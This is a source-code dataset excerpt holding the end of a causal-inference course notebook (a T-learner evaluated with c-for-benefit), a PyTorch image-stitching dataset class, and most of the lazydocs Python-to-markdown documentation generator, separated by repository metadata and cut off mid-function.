# Now, for the test set, predict each patient's risk reduction
# In[57]:
# predict the risk reduction for each of the patients in the test set
rr_t_test = t_learner.predict(X_test.drop(['TRTMT'], axis=1))
# Plot the histogram of risk reduction for the test set.
# In[58]:
# Plot a histogram of the predicted risk reduction
plt.hist(rr_t_test, bins='auto')
plt.title("Histogram of Predicted ARR for the T-learner on test set")
plt.xlabel("predicted risk reduction")
plt.ylabel("count of patients")
plt.show()
# Plot the predicted versus empirical risk reduction for the test set.
# In[59]:
# Plot the predicted versus empirical risk reduction for the test set
empirical_benefit, avg_benefit = quantile_benefit(X_test, y_test, rr_t_test)
plot_empirical_risk_reduction(empirical_benefit, avg_benefit, 'T Learner (test set)')
# Evaluate the T-learner's performance using the test set.
# In[60]:
# calculate the c-for-benefit of the t-learner on the test set
c_for_benefit_tlearner_test_set = c_statistic(rr_t_test, y_test, X_test.TRTMT)
print(f"C-for-benefit statistic on test set: {c_for_benefit_tlearner_test_set:.4f}")
# ##### Expected output
#
# ```CPP
# C-for-benefit statistic on test set: 0.5250
# ```
# The c-for-benefit of the two models were evaluated on different test sets. However, we can compare their c-for-benefit scores to get a sense of how they perform:
# - logistic regression: 0.5412
# - T-learner: 0.5250
#
# The T-learner doesn't actually do better than the logistic regression in this case. You can try to tune the hyperparameters of the T-Learner to see if you can improve it.
#
# ### Note
# While the more flexible ML techniques may improve predictive power, the sample size is too small to be certain.
# - Models like the T-learner could still be helpful in identifying subgroups who will likely not be helped by treatment, or could even be harmed by treatment.
# - So doctors can study these patients in more detail to find out how to improve their outcomes.
# ## Congratulations
#
# You've finished the assignment for Course 3 Module 1! We've seen that machine learning techniques can help determine when a treatment will have greater treatment effect for a particular patient.
| 38.256555
| 619
| 0.680213
|
4a15b0d50d31512dc79017bfc6b260abbd303fc9
| 1,137
|
py
|
Python
|
loaders/chimera_dataset.py
|
Neural-Diffusion-Research/normalized-autoencoders
|
0c77f7e29289e336c0fe5e941aaec8baa4a4fb82
|
[
"MIT"
] | 30
|
2021-06-23T10:46:45.000Z
|
2022-03-13T04:00:58.000Z
|
loaders/chimera_dataset.py
|
Neural-Diffusion-Research/normalized-autoencoders
|
0c77f7e29289e336c0fe5e941aaec8baa4a4fb82
|
[
"MIT"
] | 12
|
2021-06-30T01:27:25.000Z
|
2022-02-10T02:59:42.000Z
|
loaders/chimera_dataset.py
|
Neural-Diffusion-Research/normalized-autoencoders
|
0c77f7e29289e336c0fe5e941aaec8baa4a4fb82
|
[
"MIT"
] | 10
|
2021-06-24T23:29:46.000Z
|
2022-02-04T09:56:09.000Z
|
from torch.utils.data import Dataset
class Chimera(Dataset):
    """Dataset wrapper that stitches two digit images into one 'chimera' image.

    Args:
        ds: underlying dataset yielding (image, label) pairs with images
            shaped (C, H, W).
        mode: 'horizontal' pastes the first half of a different-label image
            onto each sample and blanks a 6-pixel band at the seam;
            'horizontal_blank' zeroes out one half, alternating by index.
    """

    def __init__(self, ds, mode='horizontal'):
        self.ds = ds
        self.mode = mode

    def __len__(self):
        return len(self.ds)

    def __getitem__(self, i):
        img, lbl = self.ds[i]
        if self.mode == 'horizontal':
            # NOTE(review): the midpoint is taken from shape[2] (width) but
            # applied along axis 1 (height); consistent only for square
            # images — confirm intent for non-square inputs.
            mid = img.shape[2] // 2
            img2, lbl2 = self.select_diff_digit(lbl, i)
            img[:, :mid, :] = img2[:, :mid, :]
            # Blank a thin band around the seam to hide the join.
            img[:, mid - 3:mid + 3, :] = 0
            return img, str(f'{lbl},{lbl2}')
        if self.mode == 'horizontal_blank':
            mid = img.shape[2] // 2
            # Alternate which half is blanked, based on sample parity.
            if i % 2 == 0:
                img[:, :mid, :] = 0.
            else:
                img[:, mid:, :] = 0.
            return img, lbl
        raise ValueError

    def select_diff_digit(self, digit, i):
        """Scan forward from index i (wrapping) for a sample whose label differs."""
        idx = i
        new_digit = digit
        while new_digit == digit:
            idx = (idx + 1) % len(self.ds)
            # idx = np.random.randint(len(self.ds))
            img, lbl = self.ds[idx]
            new_digit = lbl
        return img, lbl
| 25.840909
| 55
| 0.46438
|
4a15b128e5ed46a0f00af70a13faacb6cb09b3fd
| 37,855
|
py
|
Python
|
src/lazydocs/generation.py
|
koaleksa/lazydocs
|
ebf6ea85601f4c630e788c66eab1cb6d0b7a3331
|
[
"MIT"
] | null | null | null |
src/lazydocs/generation.py
|
koaleksa/lazydocs
|
ebf6ea85601f4c630e788c66eab1cb6d0b7a3331
|
[
"MIT"
] | null | null | null |
src/lazydocs/generation.py
|
koaleksa/lazydocs
|
ebf6ea85601f4c630e788c66eab1cb6d0b7a3331
|
[
"MIT"
] | null | null | null |
"""Main module for markdown generation."""
import datetime
import importlib
import importlib.util
import inspect
import os
import pkgutil
import re
import subprocess
import types
from pydoc import locate
from typing import Any, Callable, Dict, List, Optional
_RE_BLOCKSTART_LIST = re.compile(
r"(Args:|Arg:|Arguments:|Parameters:|Kwargs:|Attributes:|Returns:|Yields:|Kwargs:|Raises:).{0,2}$",
re.IGNORECASE,
)
_RE_BLOCKSTART_TEXT = re.compile(r"(Examples:|Example:|Todo:).{0,2}$", re.IGNORECASE)
_RE_QUOTE_TEXT = re.compile(r"(Notes:|Note:).{0,2}$", re.IGNORECASE)
_RE_TYPED_ARGSTART = re.compile(r"([\w\[\]_]{1,}?)\s*?\((.*?)\):(.{2,})", re.IGNORECASE)
_RE_ARGSTART = re.compile(r"(.{1,}?):(.{2,})", re.IGNORECASE)
_IGNORE_GENERATION_INSTRUCTION = "lazydocs: ignore"
# String templates
_SOURCE_BADGE_TEMPLATE = """
<a href="{path}"><img align="right" style="float:right;" src="https://img.shields.io/badge/-source-cccccc?style=flat-square"></a>
"""
_SEPARATOR = """
---
"""
_FUNC_TEMPLATE = """
{section} <kbd>{func_type}</kbd> `{header}`
```python
{funcdef}
```
{doc}
"""
_CLASS_TEMPLATE = """
{section} <kbd>class</kbd> `{header}`
{doc}
{init}
{variables}
{handlers}
{methods}
"""
_MODULE_TEMPLATE = """
{section} <kbd>module</kbd> `{header}`
{doc}
{global_vars}
{functions}
{classes}
"""
_OVERVIEW_TEMPLATE = """
# API Overview
## Modules
{modules}
## Classes
{classes}
## Functions
{functions}
"""
_WATERMARK_TEMPLATE = """
---
_This file was automatically generated via [lazydocs](https://github.com/ml-tooling/lazydocs)._
"""
_MKDOCS_PAGES_TEMPLATE = """title: API Reference
nav:
- Overview: {overview_file}
- ...
"""
def _get_function_signature(
function: Callable,
owner_class: Any = None,
show_module: bool = False,
ignore_self: bool = False,
wrap_arguments: bool = False,
remove_package: bool = False,
) -> str:
"""Generates a string for a function signature.
Args:
function: Selected function (or method) to generate the signature string.
owner_class: Owner class of this function.
show_module: If `True`, add module path in function signature.
ignore_self: If `True`, ignore self argument in function signature.
wrap_arguments: If `True`, wrap all arguments to new lines.
remove_package: If `True`, the package path will be removed from the function signature.
Returns:
str: Signature of selected function.
"""
isclass = inspect.isclass(function)
# Get base name.
name_parts = []
if show_module:
name_parts.append(function.__module__)
if owner_class:
name_parts.append(owner_class.__name__)
if hasattr(function, "__name__"):
name_parts.append(function.__name__)
else:
name_parts.append(type(function).__name__)
name_parts.append("__call__")
function = function.__call__ # type: ignore
name = ".".join(name_parts)
if isclass:
function = getattr(function, "__init__", None)
arguments = []
return_type = ""
if hasattr(inspect, "signature"):
parameters = inspect.signature(function).parameters
if inspect.signature(function).return_annotation != inspect.Signature.empty:
return_type = str(inspect.signature(function).return_annotation)
if return_type.startswith("<class"):
# Base class -> get real name
try:
return_type = inspect.signature(function).return_annotation.__name__
except Exception:
pass
# Remove all typing path prefixes
return_type = return_type.replace("typing.", "")
if remove_package:
# Remove all package path return type
return_type = re.sub(r"([a-zA-Z0-9_]*?\.)", "", return_type)
for parameter in parameters:
argument = str(parameters[parameter])
if ignore_self and argument == "self":
# Ignore self
continue
# Reintroduce Optionals
argument = re.sub(r"Union\[(.*?), NoneType\]", r"Optional[\1]", argument)
# Remove package
if remove_package:
# Remove all package path from parameter signature
if "=" not in argument:
argument = re.sub(r"([a-zA-Z0-9_]*?\.)", "", argument)
else:
# Remove only from part before the first =
argument_split = argument.split("=")
argument_split[0] = re.sub(
r"([a-zA-Z0-9_]*?\.)", "", argument_split[0]
)
argument = "=".join(argument_split)
arguments.append(argument)
else:
print("Seems like function " + name + " does not have any signature")
signature = name + "("
if wrap_arguments:
for i, arg in enumerate(arguments):
signature += "\n " + arg
signature += "," if i is not len(arguments) - 1 else "\n"
else:
signature += ", ".join(arguments)
signature += ")" + ((" → " + return_type) if return_type else "")
return signature
def _order_by_line_nos(objs: Any, line_nos: List[int]) -> List[str]:
"""Orders the set of `objs` by `line_nos`."""
ordering = sorted(range(len(line_nos)), key=line_nos.__getitem__)
return [objs[i] for i in ordering]
def to_md_file(
    markdown_str: str,
    filename: str,
    out_path: str = ".",
    watermark: bool = True,
    disable_markdownlint: bool = True,
) -> None:
    """Creates an API docs file from a provided text.

    Args:
        markdown_str (str): Markdown string with line breaks to write to file.
        filename (str): Filename without the .md
        out_path (str): The output directory
        watermark (bool): If `True`, add a watermark with a timestamp to bottom of the markdown files.
        disable_markdownlint (bool): If `True`, an inline tag is added to disable markdownlint for this file.
    """
    if not markdown_str:
        # Nothing to document -> never write empty files.
        return

    # Ensure the output filename has a .md extension.
    md_file = filename if filename.endswith(".md") else filename + ".md"

    if disable_markdownlint:
        markdown_str = "<!-- markdownlint-disable -->\n" + markdown_str

    if watermark:
        markdown_str += _WATERMARK_TEMPLATE.format(
            date=datetime.date.today().strftime("%d %b %Y")
        )

    print("Writing {}.".format(md_file))
    with open(os.path.join(out_path, md_file), "w") as f:
        f.write(markdown_str)
def _code_snippet(snippet: str) -> str:
"""Generates a markdown code snippet based on python code.
Args:
snippet (str): Python code.
Returns:
str: Markdown code snippet.
"""
result = "```python\n"
result += snippet + "\n"
result += "```\n\n"
return result
def _get_line_no(obj: Any) -> Optional[int]:
"""Gets the source line number of this object. None if `obj` code cannot be found."""
try:
return inspect.getsourcelines(obj)[1]
except Exception:
# no code found
return None
def _get_class_that_defined_method(meth: Any) -> Any:
    """Best-effort lookup of the class on which `meth` was defined.

    Tries, in order: the MRO of a bound method's instance class, parsing the
    function's `__qualname__` against its module, and finally the
    `__objclass__` attribute used by descriptor objects. Returns None if no
    defining class can be determined.
    """
    if inspect.ismethod(meth):
        # Bound method: walk the MRO until we find the class whose __dict__
        # holds this exact method object.
        for cls in inspect.getmro(meth.__self__.__class__):
            if cls.__dict__.get(meth.__name__) is meth:
                return cls
        meth = meth.__func__  # fallback to __qualname__ parsing
    if inspect.isfunction(meth):
        mod = inspect.getmodule(meth)
        if mod is None:
            return None
        # Recover the class name from the qualified name, e.g.
        # "Outer.method" -> look up "Outer" on the defining module
        # (stripping any ".<locals>" segment from nested scopes).
        cls = getattr(
            inspect.getmodule(meth),
            meth.__qualname__.split(".<locals>", 1)[0].rsplit(".", 1)[0],
        )
        if isinstance(cls, type):
            return cls
    return getattr(meth, "__objclass__", None)  # handle special descriptor objects
def _get_docstring(obj: Any) -> str:
return "" if obj.__doc__ is None else inspect.getdoc(obj) or ""
def _is_object_ignored(obj: Any) -> bool:
    """True if the object's docstring carries the lazydocs ignore instruction."""
    # Compare whitespace- and case-insensitively so variants such as
    # "Lazydocs: Ignore" still suppress generation.
    normalized_doc = _get_docstring(obj).replace(" ", "").lower()
    marker = _IGNORE_GENERATION_INSTRUCTION.replace(" ", "").lower()
    return marker in normalized_doc
def _is_module_ignored(module_name: str, ignored_modules: List[str]) -> bool:
"""Checks if a given module is ignored."""
if module_name.split(".")[-1].startswith("_"):
return True
for ignored_module in ignored_modules:
if module_name == ignored_module:
return True
# Check is module is subpackage of an ignored package
if module_name.startswith(ignored_module + "."):
return True
return False
def _get_src_root_path(obj: Any) -> str:
    """Get the root path to a imported module.

    Args:
        obj (Any): Imported python object.

    Returns:
        str: Full source root path to the selected object.
    """
    module = obj
    if not isinstance(obj, types.ModuleType):
        # Non-module objects: resolve the module they were defined in.
        module = inspect.getmodule(obj)
    root_package = module.__name__.split(".")[0]
    # NOTE(review): splitting the file path on the package name is fragile if
    # the name also appears earlier in the path (e.g. /home/foo/foo/...) —
    # confirm before relying on this for arbitrary install layouts.
    return module.__file__.split(root_package)[0] + root_package
def _get_doc_summary(obj: Any) -> str:
    """Return only the first line (the summary) of the object's docstring."""
    return _get_docstring(obj).partition("\n")[0]
def _get_anchor_tag(header: str) -> str:
anchor_tag = header.strip().lower()
# Whitespaces to -
anchor_tag = re.compile(r"\s").sub("-", anchor_tag)
# Remove not allowed characters
anchor_tag = re.compile(r"[^a-zA-Z0-9-_]").sub("", anchor_tag)
return anchor_tag
def _doc2md(obj: Any) -> str:
    """Parse docstring (with getdoc) according to Google-style formatting and convert to markdown.

    Args:
        obj: Selected object for markdown generation.

    Returns:
        str: Markdown documentation for docstring of selected object.
    """
    # TODO Evaluate to use: https://github.com/rr-/docstring_parser
    # The specfication of Inspect#getdoc() was changed since version 3.5,
    # the documentation strings are now inherited if not overridden.
    # For details see: https://docs.python.org/3.6/library/inspect.html#inspect.getdoc
    # doc = getdoc(func) or ""
    doc = _get_docstring(obj)
    # Indentation column of the current section block (Args:, Returns:, ...).
    blockindent = 0
    # Indentation column of the current argument entry within an arg block.
    argindent = 1
    out = []
    # State flags for the line-by-line conversion below:
    arg_list = False  # inside an argument-style section (matched by _RE_BLOCKSTART_LIST)
    literal_block = False  # inside an RST "::" literal block
    md_code_snippet = False  # inside a fenced ``` code snippet
    quote_block = False  # inside a quoted section (matched by _RE_QUOTE_TEXT)
    for line in doc.split("\n"):
        indent = len(line) - len(line.lstrip())
        if not md_code_snippet and not literal_block:
            # Outside verbatim blocks, indentation only drives state; strip it.
            line = line.lstrip()
        if line.startswith(">>>"):
            # support for doctest
            line = line.replace(">>>", "```") + "```"
        if (
            _RE_BLOCKSTART_LIST.match(line)
            or _RE_BLOCKSTART_TEXT.match(line)
            or _RE_QUOTE_TEXT.match(line)
        ):
            # start of a new block
            blockindent = indent
            if quote_block:
                quote_block = False
            if literal_block:
                # break literal block
                out.append("```\n")
                literal_block = False
            out.append("\n\n**{}**\n".format(line.strip()))
            arg_list = bool(_RE_BLOCKSTART_LIST.match(line))
            if _RE_QUOTE_TEXT.match(line):
                quote_block = True
                out.append("\n>")
        elif line.strip().startswith("```"):
            # Code snippet is used; toggle the fenced-snippet state.
            if md_code_snippet:
                md_code_snippet = False
            else:
                md_code_snippet = True
            out.append(line)
        elif line.strip().endswith("::"):
            # Literal Block Support: https://docutils.sourceforge.io/docs/user/rst/quickref.html#literal-blocks
            literal_block = True
            out.append(line.replace("::", ":\n```"))
        elif quote_block:
            out.append(line.strip())
        elif line.strip().startswith("-"):
            # Allow bullet lists
            out.append("\n" + (" " * indent) + line)
        elif indent > blockindent:
            # Line is indented relative to the section header -> section content.
            if arg_list and not literal_block and _RE_TYPED_ARGSTART.match(line):
                # start of new argument ("name (type): description")
                out.append(
                    "\n"
                    + " " * blockindent
                    + " - "
                    + _RE_TYPED_ARGSTART.sub(r"<b>`\1`</b> (\2): \3", line)
                )
                argindent = indent
            elif arg_list and not literal_block and _RE_ARGSTART.match(line):
                # start of an exception-type block ("Name: description")
                out.append(
                    "\n"
                    + " " * blockindent
                    + " - "
                    + _RE_ARGSTART.sub(r"<b>`\1`</b>: \2", line)
                )
                argindent = indent
            elif indent > argindent:
                # attach docs text of argument
                # * (blockindent + 2)
                out.append(" " + line)
            else:
                out.append(line)
        else:
            if line.strip() and literal_block:
                # indent has changed, if not empty line, break literal block
                line = "```\n" + line
                literal_block = False
            out.append(line)
        # Join lines: verbatim inside snippets, paragraph breaks on blank lines.
        if md_code_snippet:
            out.append("\n")
        elif not line and not quote_block:
            out.append("\n\n")
        elif not line and quote_block:
            out.append("\n>")
        else:
            out.append(" ")
    return "".join(out)
class MarkdownGenerator(object):
    """Markdown generator class."""

    def __init__(
        self,
        src_root_path: Optional[str] = None,
        src_base_url: Optional[str] = None,
        remove_package_prefix: bool = False,
    ):
        """Initializes the markdown API generator.

        Args:
            src_root_path: The root folder name containing all the sources.
            src_base_url: The base github link. Should include branch name.
                All source links are generated with this prefix.
            remove_package_prefix: If `True`, the package prefix will be removed from all functions and methods.
        """
        self.src_root_path = src_root_path
        self.src_base_url = src_base_url
        self.remove_package_prefix = remove_package_prefix
        # Metadata for every generated object; consumed later by `overview2md`.
        self.generated_objects: List[Dict] = []

    def _get_src_path(self, obj: Any, append_base: bool = True) -> str:
        """Creates a src path string with line info for use as markdown link.

        Args:
            obj (Any): Selected object to get the src path.
            append_base (bool, optional): If `True`, the src repo url will be appended. Defaults to True.

        Returns:
            str: Source code path with line marker.
        """
        src_root_path = None
        if self.src_root_path:
            src_root_path = os.path.abspath(self.src_root_path)
        else:
            # Without a configured root there is nothing to make paths relative to.
            return ""
        try:
            path = os.path.abspath(inspect.getsourcefile(obj))  # type: ignore
        except Exception:
            return ""
        assert isinstance(path, str)
        if src_root_path not in path:
            # this can happen with e.g.
            # inlinefunc-wrapped functions
            if hasattr(obj, "__module__"):
                path = "%s.%s" % (obj.__module__, obj.__name__)
            else:
                path = obj.__name__
            assert isinstance(path, str)
            path = path.replace(".", "/")
        relative_path = os.path.relpath(path, src_root_path)
        lineno = _get_line_no(obj)
        lineno_hashtag = "" if lineno is None else "#L{}".format(lineno)
        # add line hash
        relative_path = relative_path + lineno_hashtag
        if append_base and self.src_base_url:
            relative_path = os.path.join(self.src_base_url, relative_path)
        return relative_path

    def func2md(self, func: Callable, clsname: str = "", depth: int = 3) -> str:
        """Takes a function (or method) and generates markdown docs.

        Args:
            func (Callable): Selected function (or method) for markdown generation.
            clsname (str, optional): Class name to prepend to funcname. Defaults to "".
            depth (int, optional): Number of # to append to class name. Defaults to 3.

        Returns:
            str: Markdown documentation for selected function.
        """
        if _is_object_ignored(func):
            # The function is ignored from generation
            return ""
        section = "#" * depth
        funcname = func.__name__
        modname = None
        if hasattr(func, "__module__"):
            modname = func.__module__
        escfuncname = (
            "%s" % funcname if funcname.startswith("_") else funcname
        )  # "`%s`"
        full_name = "%s%s" % ("%s." % clsname if clsname else "", escfuncname)
        header = full_name
        if self.remove_package_prefix:
            # TODO: Evaluate
            # Only use the name
            header = escfuncname
        path = self._get_src_path(func)
        doc = _doc2md(func)
        summary = _get_doc_summary(func)
        funcdef = _get_function_signature(
            func, ignore_self=True, remove_package=self.remove_package_prefix
        )
        # split the function definition if it is too long
        lmax = 80
        if len(funcdef) > lmax:
            funcdef = _get_function_signature(
                func,
                ignore_self=True,
                wrap_arguments=True,
                remove_package=self.remove_package_prefix,
            )
        # Classify the callable: bound -> classmethod, unowned -> function,
        # class-owned -> method.
        if inspect.ismethod(func):
            func_type = "classmethod"
        else:
            if _get_class_that_defined_method(func) is None:
                func_type = "function"
            else:
                # function of a class
                func_type = "method"
        self.generated_objects.append(
            {
                "type": func_type,
                "name": header,
                "full_name": full_name,
                "module": modname,
                "anchor_tag": _get_anchor_tag(func_type + "-" + header),
                "description": summary,
            }
        )
        # build the signature
        markdown = _FUNC_TEMPLATE.format(
            section=section,
            header=header,
            funcdef=funcdef,
            func_type=func_type,
            doc=doc if doc else "*No documentation found.*",
        )
        if path:
            markdown = _SOURCE_BADGE_TEMPLATE.format(path=path) + markdown
        return markdown

    def class2md(self, cls: Any, depth: int = 2) -> str:
        """Takes a class and creates markdown text to document its methods and variables.

        Args:
            cls (class): Selected class for markdown generation.
            depth (int, optional): Number of # to append to function name. Defaults to 2.

        Returns:
            str: Markdown documentation for selected class.
        """
        if _is_object_ignored(cls):
            # The class is ignored from generation
            return ""
        section = "#" * depth
        subsection = "#" * (depth + 2)
        clsname = cls.__name__
        modname = cls.__module__
        header = clsname
        path = self._get_src_path(cls)
        doc = _doc2md(cls)
        summary = _get_doc_summary(cls)
        self.generated_objects.append(
            {
                "type": "class",
                "name": header,
                "full_name": header,
                "module": modname,
                "anchor_tag": _get_anchor_tag("class-" + header),
                "description": summary,
            }
        )
        try:
            # object module should be the same as the calling module
            if (
                hasattr(cls.__init__, "__module__")
                and cls.__init__.__module__ == modname
            ):
                init = self.func2md(cls.__init__, clsname=clsname)
            else:
                init = ""
        except (ValueError, TypeError):
            # this happens if __init__ is outside the repo
            init = ""
        # Document public properties.
        variables = []
        for name, obj in inspect.getmembers(
            cls, lambda a: not (inspect.isroutine(a) or inspect.ismethod(a))
        ):
            if not name.startswith("_") and type(obj) == property:
                comments = _doc2md(obj) or inspect.getcomments(obj)
                comments = "\n\n%s" % comments if comments else ""
                property_name = f"{clsname}.{name}"
                if self.remove_package_prefix:
                    property_name = name
                variables.append(
                    _SEPARATOR
                    + "\n%s <kbd>property</kbd> %s%s\n"
                    % (subsection, property_name, comments)
                )
        # Document public method descriptors (listed only, no body docs).
        handlers = []
        for name, obj in inspect.getmembers(cls, inspect.ismethoddescriptor):
            if (
                not name.startswith("_")
                and hasattr(obj, "__module__")
                # object module should be the same as the calling module
                and obj.__module__ == modname
            ):
                handler_name = f"{clsname}.{name}"
                if self.remove_package_prefix:
                    handler_name = name
                handlers.append(
                    _SEPARATOR
                    + "\n%s <kbd>handler</kbd> %s\n" % (subsection, handler_name)
                )
        # Document public methods (skipping anything already listed as a handler).
        methods = []
        # for name, obj in getmembers(cls, inspect.isfunction):
        for name, obj in inspect.getmembers(
            cls, lambda a: inspect.ismethod(a) or inspect.isfunction(a)
        ):
            if (
                not name.startswith("_")
                and hasattr(obj, "__module__")
                and name not in handlers
                # object module should be the same as the calling module
                and obj.__module__ == modname
            ):
                function_md = self.func2md(obj, clsname=clsname, depth=depth + 1)
                if function_md:
                    methods.append(_SEPARATOR + function_md)
        markdown = _CLASS_TEMPLATE.format(
            section=section,
            header=header,
            doc=doc if doc else "",
            init=init,
            variables="".join(variables),
            handlers="".join(handlers),
            methods="".join(methods),
        )
        if path:
            markdown = _SOURCE_BADGE_TEMPLATE.format(path=path) + markdown
        return markdown

    def module2md(self, module: types.ModuleType, depth: int = 1) -> str:
        """Takes an imported module object and create a Markdown string containing functions and classes.

        Args:
            module (types.ModuleType): Selected module for markdown generation.
            depth (int, optional): Number of # to append before module heading. Defaults to 1.

        Returns:
            str: Markdown documentation for selected module.
        """
        if _is_object_ignored(module):
            # The module is ignored from generation
            return ""
        modname = module.__name__
        doc = _doc2md(module)
        summary = _get_doc_summary(module)
        path = self._get_src_path(module)
        found = []
        self.generated_objects.append(
            {
                "type": "module",
                "name": modname,
                "full_name": modname,
                "module": modname,
                "anchor_tag": _get_anchor_tag("module-" + modname),
                "description": summary,
            }
        )
        # Collect classes defined in this module, ordered by source line.
        classes: List[str] = []
        line_nos: List[int] = []
        for name, obj in inspect.getmembers(module, inspect.isclass):
            # handle classes
            found.append(name)
            if (
                not name.startswith("_")
                and hasattr(obj, "__module__")
                and obj.__module__ == modname
            ):
                class_markdown = self.class2md(obj, depth=depth + 1)
                if class_markdown:
                    classes.append(_SEPARATOR + class_markdown)
                    line_nos.append(_get_line_no(obj) or 0)
        classes = _order_by_line_nos(classes, line_nos)
        # Collect functions defined in this module, ordered by source line.
        functions: List[str] = []
        line_nos = []
        for name, obj in inspect.getmembers(module, inspect.isfunction):
            # handle functions
            found.append(name)
            if (
                not name.startswith("_")
                and hasattr(obj, "__module__")
                and obj.__module__ == modname
            ):
                function_md = self.func2md(obj, depth=depth + 1)
                if function_md:
                    functions.append(_SEPARATOR + function_md)
                    line_nos.append(_get_line_no(obj) or 0)
        functions = _order_by_line_nos(functions, line_nos)
        # Everything else that is public and not already found is listed as a
        # global variable.
        variables: List[str] = []
        line_nos = []
        for name, obj in module.__dict__.items():
            if not name.startswith("_") and name not in found:
                if hasattr(obj, "__module__") and obj.__module__ != modname:
                    continue
                if hasattr(obj, "__name__") and not obj.__name__.startswith(modname):
                    continue
                comments = inspect.getcomments(obj)
                comments = ": %s" % comments if comments else ""
                variables.append("- **%s**%s" % (name, comments))
                line_nos.append(_get_line_no(obj) or 0)
        variables = _order_by_line_nos(variables, line_nos)
        if variables:
            new_list = ["\n**Global Variables**", "---------------", *variables]
            variables = new_list
        markdown = _MODULE_TEMPLATE.format(
            header=modname,
            section="#" * depth,
            doc=doc,
            global_vars="\n".join(variables) if variables else "",
            functions="\n".join(functions) if functions else "",
            classes="".join(classes) if classes else "",
        )
        if path:
            markdown = _SOURCE_BADGE_TEMPLATE.format(path=path) + markdown
        return markdown

    def import2md(self, obj: Any, depth: int = 1) -> str:
        """Generates markdown documentation for a selected object/import.

        Args:
            obj (Any): Selcted object for markdown docs generation.
            depth (int, optional): Number of # to append before heading. Defaults to 1.

        Returns:
            str: Markdown documentation of selected object.
        """
        # Dispatch to the matching generator by object kind.
        if inspect.isclass(obj):
            return self.class2md(obj, depth=depth)
        elif isinstance(obj, types.ModuleType):
            return self.module2md(obj, depth=depth)
        elif callable(obj):
            return self.func2md(obj, depth=depth)
        else:
            print(f"Could not generate markdown for object type {str(type(obj))}")
            return ""

    def overview2md(self) -> str:
        """Generates a documentation overview file based on the generated docs."""
        # Build the "Modules" section from collected metadata.
        entries_md = ""
        for obj in list(
            filter(lambda d: d["type"] == "module", self.generated_objects)
        ):
            full_name = obj["full_name"]
            if "module" in obj:
                link = "./" + obj["module"] + ".md#" + obj["anchor_tag"]
            else:
                link = "#unknown"
            description = obj["description"]
            entries_md += f"\n- [`{full_name}`]({link})"
            if description:
                entries_md += ": " + description
        if not entries_md:
            entries_md = "\n- No modules"
        modules_md = entries_md
        # Build the "Classes" section.
        entries_md = ""
        for obj in list(filter(lambda d: d["type"] == "class", self.generated_objects)):
            module_name = obj["module"].split(".")[-1]
            name = module_name + "." + obj["full_name"]
            link = "./" + obj["module"] + ".md#" + obj["anchor_tag"]
            description = obj["description"]
            entries_md += f"\n- [`{name}`]({link})"
            if description:
                entries_md += ": " + description
        if not entries_md:
            entries_md = "\n- No classes"
        classes_md = entries_md
        # Build the "Functions" section.
        entries_md = ""
        for obj in list(
            filter(lambda d: d["type"] == "function", self.generated_objects)
        ):
            module_name = obj["module"].split(".")[-1]
            name = module_name + "." + obj["full_name"]
            link = "./" + obj["module"] + ".md#" + obj["anchor_tag"]
            description = obj["description"]
            entries_md += f"\n- [`{name}`]({link})"
            if description:
                entries_md += ": " + description
        if not entries_md:
            entries_md = "\n- No functions"
        functions_md = entries_md
        return _OVERVIEW_TEMPLATE.format(
            modules=modules_md, classes=classes_md, functions=functions_md
        )
def generate_docs(
    paths: List[str],
    output_path: str = "./docs",
    src_root_path: Optional[str] = None,
    src_base_url: Optional[str] = None,
    remove_package_prefix: bool = False,
    ignored_modules: Optional[List[str]] = None,
    overview_file: Optional[str] = None,
    watermark: bool = True,
    validate: bool = False,
) -> None:
    """Generates markdown documentation for provided paths based on Google-style docstrings.

    Args:
        paths: Selected paths or import name for markdown generation.
        output_path: The output path for the creation of the markdown files. Set this to `stdout` to print all markdown to stdout.
        src_root_path: The root folder name containing all the sources. Fallback to git repo root.
        src_base_url: The base url of the github link. Should include branch name. All source links are generated with this prefix.
        remove_package_prefix: If `True`, the package prefix will be removed from all functions and methods.
        ignored_modules: A list of modules that should be ignored.
        overview_file: Filename of overview file. If not provided, no overview file will be generated.
        watermark: If `True`, add a watermark with a timestamp to bottom of the markdown files.
        validate: If `True`, validate the docstrings via pydocstyle. Requires pydocstyle to be installed.
    """
    stdout_mode = output_path.lower() == "stdout"
    if not stdout_mode and not os.path.exists(output_path):
        # Create output path
        os.makedirs(output_path)
    if not ignored_modules:
        ignored_modules = list()
    if not src_root_path:
        try:
            # Set src root path to git root
            src_root_path = (
                subprocess.Popen(
                    ["git", "rev-parse", "--show-toplevel"], stdout=subprocess.PIPE
                )
                .communicate()[0]
                .rstrip()
                .decode("utf-8")
            )
            if src_root_path and src_base_url is None and not stdout_mode:
                # Set base url to be relative to the git root folder based on output_path
                src_base_url = os.path.relpath(
                    src_root_path, os.path.abspath(output_path)
                )
        except Exception:
            # Ignore all exceptions
            pass
    # Initialize Markdown Generator
    generator = MarkdownGenerator(
        src_root_path=src_root_path,
        src_base_url=src_base_url,
        remove_package_prefix=remove_package_prefix,
    )
    pydocstyle_cmd = "pydocstyle --convention=google --add-ignore=D100,D101,D102,D103,D104,D105,D107,D202"
    # Each entry in `paths` may be a package directory, a single .py file, or a
    # dotted import path; each case is handled separately below.
    for path in paths:  # lgtm [py/non-iterable-in-for-loop]
        if os.path.isdir(path):
            if validate and subprocess.call(f"{pydocstyle_cmd} {path}", shell=True) > 0:
                raise Exception(f"Validation for {path} failed.")
            if not stdout_mode:
                print(f"Generating docs for python package at: {path}")
            # Generate one file for every discovered module
            for loader, module_name, _ in pkgutil.walk_packages([path]):
                if _is_module_ignored(module_name, ignored_modules):
                    # Add module to ignore list, so submodule will also be ignored
                    ignored_modules.append(module_name)
                    continue
                try:
                    mod = loader.find_module(module_name).load_module(module_name)  # type: ignore
                    module_md = generator.module2md(mod)
                    if not module_md:
                        # Module md is empty -> ignore module and all submodules
                        # Add module to ignore list, so submodule will also be ignored
                        ignored_modules.append(module_name)
                        continue
                    if stdout_mode:
                        print(module_md)
                    else:
                        to_md_file(
                            module_md,
                            mod.__name__,
                            out_path=output_path,
                            watermark=watermark,
                        )
                except Exception as ex:
                    print(
                        f"Failed to generate docs for module {module_name}: " + repr(ex)
                    )
        elif os.path.isfile(path):
            if validate and subprocess.call(f"{pydocstyle_cmd} {path}", shell=True) > 0:
                raise Exception(f"Validation for {path} failed.")
            if not stdout_mode:
                print(f"Generating docs for python module at: {path}")
            module_name = os.path.basename(path)
            # Load the single file as a module via importlib.
            spec = importlib.util.spec_from_file_location(
                module_name,
                path,
            )
            assert spec is not None
            mod = importlib.util.module_from_spec(spec)
            spec.loader.exec_module(mod)  # type: ignore
            if mod:
